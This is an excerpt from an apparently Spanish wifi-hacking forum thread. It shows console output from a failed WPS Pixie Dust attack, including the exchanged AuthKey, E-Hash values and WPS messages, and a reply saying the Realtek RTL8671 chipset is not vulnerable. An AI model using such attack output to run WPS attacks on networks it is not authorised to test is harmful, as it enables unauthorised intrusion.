[P] AuthKey: 30:f8:51:9e:d8:f6:b7:d4:8d:13:9d:93:19:63:cc:2a:cc:8b:d3:74:3e:7b:10:02:1d:49:c3:9b:54:1d:c3:cb
[+] Sending M2 message
[P] E-Hash1: 06:13:1a:f6:38:70:a8:31:29:ac:9b:82:37:4f:a5:a2:20:89:e6:66:48:80:23:60:b0:e5:48:99:f2:f5:cc:c1
[P] E-Hash2: 79:a8:c7:f4:59:73:5f:83:ef:32:9c:72:3b:9e:2b:c2:7f:2e:19:ff:6e:63:f5:79:9c:6f:c2:7d:20:69:e6:25
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK

La respuesta es la misma que antes :  Este chipset (Realtek RTL8671) no es vulnerable al ataque pixie dust wink

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Pie de página

Información del usuario

Ultimo usuario registrado: Ike
Usuarios registrados conectados: 1
Invitados conectados: 4

Conectados: Ike

Estadisticas de los foros

Número total de usuarios registrados: 356
Número total de temas: 615
Número total de mensajes: 4,217

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20